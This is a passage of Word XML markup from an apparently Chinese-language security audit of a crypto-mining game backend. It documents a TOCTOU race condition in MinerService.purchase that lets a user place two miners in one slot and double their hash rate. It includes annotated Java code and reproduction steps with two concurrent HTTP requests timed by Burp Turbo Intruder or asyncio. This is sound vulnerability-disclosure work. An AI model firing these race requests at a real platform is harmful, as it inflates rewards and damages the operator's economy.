        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.getBuyPrice → MinerService.java.getPriceFactor → MinerService.java.getPriceFactor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="289"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getStarBonusPercent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → MinerService.java.getBuyPrice → MinerService.java.getPurchaseConfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.purchase → MinerService.java.purchase → RedisMiningBalanceCache.java.invalidate → RedisMiningBalanceCache.java.balanceKey</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audit_m146_462_purchase_ctrl-path1of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_478_purchase_ctrl-path2of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_493_purchase_ctrl-path3of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_503_purchase_ctrl-path4of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_522_purchase_ctrl-path7of11.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m146_553_purchase_ctrl-path10of11.md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：MinerService.java#purchase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_15" w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞14：坑位占用检查 TOCTOU 竞态条件导致同一坑位重复放入矿机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="29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：坑位占用原子性缺失（TOCTOU Race Condition on Slot Placement）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="29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src/main/java/com/gameBack/mjservice/service/MinerService.java:purchase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="29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业务逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="29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29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pBdr>
          <w:bottom w:val="single" w:color="dee0e3"/>
          <w:between w:val="single" w:color="dee0e3"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="29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purchase()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法中，坑位空闲校验 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在获取数据库行锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">执行，二者之间存在可被利用的时间窗口。攻击者同时发送两个针对同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的购矿请求，两个事务均可在任一事务提交前通过坑位校验，随后串行竞争 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行锁：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务 A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：通过坑位校验 → 获取行锁 → 扣款 → 保存矿机到 slotId=X → 提交，释放锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务 B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过坑位校验（此时 A 未提交，B 读到的坑位仍为空） → 等待行锁 → A 提交后获取锁 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不再重新校验坑位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 扣款 → 再次保存矿机到 slotId=X → 提交</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">结果：同一坑位存在两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserMiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时两条记录均被命中，导致该坑位算力被重复计入，用户总算力异常叠加，长期挖矿收益超出游戏设计上限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="302"/>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/api/miner/purchase</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter 验证 Bearer token，userId 从 Token 解析，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter 校验请求签名防重放（但无法防并发同 nonce 不同请求）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → MinerController.purchase()</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → MinerService.purchase()           ← 竞态窗口在此方法内</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ① canPlaceInSlot(userId, slotId)  ← 无锁校验，竞态起始点</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ② findByUserIdForUpdate(userId)   ← 获取行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ③ userMinerRepository.save(miner) ← 无重新校验坑位，竞态终点</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">          ④ recalcUserLevelAndHashRate()    ← 查出所有 inStorage=0 矿机，重复记录被纳入算力</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="303"/>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spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者每次攻击需支付两倍矿机价格（余额正确扣减两次），但换取了同一坑位双倍算力，导致长期挖矿收益成倍增加。若游戏内挖矿产出对应实际 USDT/代币奖励，该漏洞可持续放大矿机投资回报率，对平台经济模型造成持续性损害。</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PurchaseForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   @Min(1) @Max(50) Integer minerLevel;   ← 矿机等级</w:t>
              <w:br/>
              <w:t>//   @Min(1) @Max(9)  Integer slotId;       ← 坑位编号（攻击者指定同一坑位）</w:t>
              <w:br/>
              <w:t>@PostMapping("/purchase")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; purchase(@CurrentUserId Long userId,    // ← userId 来自 Token，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                        @RequestBody @Valid PurchaseForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = minerService.purchase(userId, form.getMinerLevel(), form.getSlotId());  // ← slotId 攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(miner);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：MinerService.java#purchase</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner purchase(Long userId, Integer minerLevel, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!canPlaceInSlot(userId, slotId)) {               // ← ① 无锁坑位校验：Tx A 和 Tx B 均在此返回 true</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("坑位未解锁或已被占用");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 两个并发事务均通过上方校验后，在此串行竞争行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserIdForUpdate(userId)  // ← ② 行锁仅保护余额，不保护坑位</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户账户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(account.getGoldBalance().subtract(price));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setMinerLevel(minerLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);                      // ← ③ 未重新校验 canPlaceInSlot，直接写入同一 slotId</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStatus(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStarLevel(0);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);              // ← 漏洞点</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：Tx A、Tx B 均执行此行，产生两条 slotId 相同的记录</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);           // ← ④ 统计所有 inStorage=0 矿机，重复记录被计入算力</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 算力重算：MinerService.java#recalcUserLevelAndHashRate</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0);  // ← 查出两条 slotId=X 的记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxLevel = miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal totalHash = computeBaseTotalHashRate(userId);  // ← 若基于 miners 列表计算，算力翻倍</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同时发送以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两个完全相同的请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（使用 Burp Suite Intruder 并发模式、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parallel 或 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等工具同时触发）：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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者的有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;signAppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;signTimestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;signNonce_请求1专用&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;针对请求1计算的合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerLevel":1,"slotId":1}</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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者的有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;signAppKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;signTimestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;signNonce_请求2专用（不同于请求1）&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;针对请求2计算的合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerLevel":1,"slotId":1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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注意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：两次请求使用不同的 nonce（通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的防重放校验），但业务逻辑层不感知 nonce，两个请求均为合法签名请求。</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304"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用一个余额充足的普通用户账号登录，获取有效 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认 slotId=1 对该用户已解锁且当前为空（已有一台矿机取出/未放入）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="306"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时发送上述两个 HTTP 请求（并发窗口 &lt; 100ms 即可，可使用 Burp Turbo Intruder 或 Python asyncio.gather）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="307"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">观察响应：两个请求均返回 HTTP 200 及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserMiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象；</w:t>
      </w:r>
    </w:p>
